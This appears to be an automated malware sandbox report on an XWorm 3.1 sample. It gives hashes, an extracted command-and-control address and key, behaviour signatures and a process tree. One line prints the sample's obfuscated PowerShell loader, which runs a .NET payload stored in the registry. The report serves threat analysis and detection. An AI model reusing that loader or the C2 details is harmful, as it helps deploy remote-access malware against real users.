Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01/03/2025, 20:20
Static task
static1
Behavioral task
behavioral1
Sample
5.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5.exe
Resource
win10v2004-20250217-en
General
-
Target
5.exe
-
Size
490KB
-
MD5
286b980a155209c4ef664687913b8113
-
SHA1
ae96bfe4b71d52ab46994c496d0c07ed2f28c5f3
-
SHA256
59b912dd8b99eb28efe1f30d84082baa5d2e09188c5f97ef1e19a043b245228c
-
SHA512
cae27348d906b5d4d7266492aae148e25d66124890d63fe03bafca86c83dbd362bc26a36d357fb07f4dbffa765e25c85aff9589c582812b43c106d05845bf611
-
SSDEEP
12288:Ozj3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd:QkGTy
Malware Config
Extracted
xworm
3.1
again-stuff.gl.at.ply.gg:35361
w1O93T06AbTXm6Hz
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000012117-5.dat family_xworm behavioral1/memory/1764-8-0x0000000000050000-0x000000000005E000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2732 created 428 2732 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 4 IoCs
pid Process 1764 DeadMmxq.exe 2036 DeadMmxq.exe 2520 DeadR.exe 2828 DeadR.exe -
pid Process 2732 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2732 set thread context of 1904 2732 powershell.EXE 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadR.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0468356e78adb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2732 powershell.EXE 2732 powershell.EXE 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe 1904 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2732 powershell.EXE Token: SeDebugPrivilege 2732 powershell.EXE Token: SeDebugPrivilege 1904 dllhost.exe Token: SeAuditPrivilege 852 svchost.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 2392 wrote to memory of 1764 2392 5.exe 30 PID 2392 wrote to memory of 1764 2392 5.exe 30 PID 2392 wrote to memory of 1764 2392 5.exe 30 PID 2392 wrote to memory of 2036 2392 5.exe 31 PID 2392 wrote to memory of 2036 2392 5.exe 31 PID 2392 wrote to memory of 2036 2392 5.exe 31 PID 2392 wrote to memory of 2520 2392 5.exe 32 PID 2392 wrote to memory of 2520 2392 5.exe 32 PID 2392 wrote to memory of 2520 2392 5.exe 32 PID 2392 wrote to memory of 2520 2392 5.exe 32 PID 2392 wrote to memory of 2828 2392 5.exe 33 PID 2392 wrote to memory of 2828 2392 5.exe 33 PID 2392 wrote to memory of 2828 2392 5.exe 33 PID 2392 wrote to memory of 2828 2392 5.exe 33 PID 2752 wrote to memory of 2732 2752 taskeng.exe 35 PID 2752 wrote to memory of 2732 2752 taskeng.exe 35 PID 2752 wrote to memory of 2732 2752 taskeng.exe 35 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 2732 wrote to memory of 1904 2732 powershell.EXE 37 PID 1904 wrote to memory of 428 1904 dllhost.exe 5 PID 1904 wrote to memory of 472 1904 dllhost.exe 6 PID 1904 wrote to memory of 484 1904 dllhost.exe 7 PID 1904 wrote to memory of 492 1904 dllhost.exe 8 PID 1904 wrote to memory of 588 1904 dllhost.exe 9 PID 1904 wrote to memory of 668 1904 dllhost.exe 10 PID 1904 wrote to memory of 752 1904 dllhost.exe 11 PID 1904 wrote to memory of 816 1904 dllhost.exe 12 PID 1904 wrote to memory of 852 1904 dllhost.exe 13 PID 1904 wrote to memory of 960 1904 dllhost.exe 15 PID 1904 wrote to memory of 280 1904 dllhost.exe 16 PID 1904 wrote to memory of 1040 1904 dllhost.exe 17 PID 1904 wrote to memory of 1068 1904 dllhost.exe 18 PID 1904 wrote to memory of 1076 1904 dllhost.exe 19 PID 1904 wrote to memory of 1124 1904 dllhost.exe 20 PID 1904 wrote to memory of 1160 1904 dllhost.exe 21 PID 1904 wrote to memory of 1392 1904 dllhost.exe 23 PID 1904 wrote to memory of 1592 1904 dllhost.exe 24 PID 1904 wrote to memory of 804 1904 dllhost.exe 25 PID 1904 wrote to memory of 2444 1904 dllhost.exe 26 PID 1904 wrote to memory of 2464 1904 dllhost.exe 27 PID 1904 wrote to memory of 1764 1904 dllhost.exe 30 PID 1904 wrote to memory of 2036 1904 dllhost.exe 31 PID 1904 wrote to memory of 2752 1904 dllhost.exe 34
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{65623ccb-0892-4b33-a401-6302030a9bc4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:588
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1592
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:804
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:668
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1040
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:852 -
C:\Windows\system32\taskeng.exetaskeng.exe {2F7897D9-861F-411A-B041-35612C225008} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](68)+''+'e'+''+'a'+''+[Char](100)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1068
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1076
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1160
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1392
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2444
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2464
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1124
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"3⤵
- Executes dropped EXE
PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"3⤵
- Executes dropped EXE
PID:2036
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2520
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2828
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD54846c3d667fad5ac518196fbbd7edfb6
SHA145af67cf4f1b0fecd4311c73ad37052613e27344
SHA25602af5bf1358466c9c5189058e13a7d5860123ee2933a854ca528a8622d4bbf08
SHA51272f79e2a05c07db71bd1b5615a701bfa63e62c83d52a283df0ed087f5fa30eb909689d08973a8187e2b50250513efd2f85b8c1dac7637434334bee717647ab13
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4